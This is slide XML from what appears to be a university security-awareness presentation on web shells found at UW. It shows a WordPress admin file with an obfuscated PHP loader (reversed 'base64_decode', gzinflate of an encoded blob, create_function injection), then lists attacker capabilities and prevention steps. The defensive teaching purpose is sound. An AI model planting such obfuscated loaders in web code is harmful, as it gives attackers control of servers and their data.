            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/**</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> * General settings administration panel.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> * @package WordPress</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> * @subpackage Administration</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/** WordPress Administration Bootstrap </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>require_once( dirname( __FILE__ ) . '/admin.php' );</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Web Shells at UW (3 of 3)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="85206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800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$D=strrev('edoced_46esab');</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$s=gzinflate($D('5b1rdxrH0ij82Xut/R9aE5KBGCFAtreDBJasiy3HlhxdbMeWDxlggIkGhswMwoqj/36qqi/TPReEnOznec96vXdspru6uvpeXVVdVXLm8bg7c6KobT3d3PzJeeI+2vzpSePR0Nl89GjQbD7tNdz+08fNR40n1hb7979K/cAPQtZm1nA4tLYgYeAOnbkfd51+7AVTyLEPPd+N3jhTW8+eR27X+d35AgBxOHf1rP7YCSM3xqLvvekgWETrjebjBhb/97+8YXnNnczim3Kpe3Zw+u7g9JP98vz8bfcCvrq7Lw6Oz+3PlQr7+u9/MfhTgnrC3ZE7jSPA54Shc1O2XgTByHetKrPO/Hk4wx/PvekI/31zdvw8iPGX53SdsD/2rt0QP391pgP3C/46dSY9HxIrW7wKoGgWuqPuxIn747K9YbMa8yYzPxi4Zfsvu6rTUIE8e8PDxFWoxz9j1xm4YZnANhq1OntUf8SOg5gdBvPpwJZU4B/3ixeLz9t//+sWu2vHm3pd6Myy7YZhEHb9YGRXjy9ev8ZySSYkdwkgsqt1M2 … J6/8F')); </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>create_function("","}$s//"); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1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Web Shell Effects</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1121625"/>
            <a:ext cx="8520600" cy="3833400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Attackers may:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Deface web pages</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Add, delete, and execute files</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Run operating system commands and shell scripts</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>teal confidential data and credentials</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Attack other systems on the network</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Distribute malware</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Create phishing sites</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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you can do about web shells</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Prevent</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Remove/disable unnecessary components, services</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Patch core, plugins, themes, supporting apps</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Practice secure coding </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Back up regularly</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Secure the underlying operating system</a:t>
            </a:r>
            <a:endParaRPr>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Agenda</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1171563"/>
            <a:ext cx="8520600" cy="3416400"/>
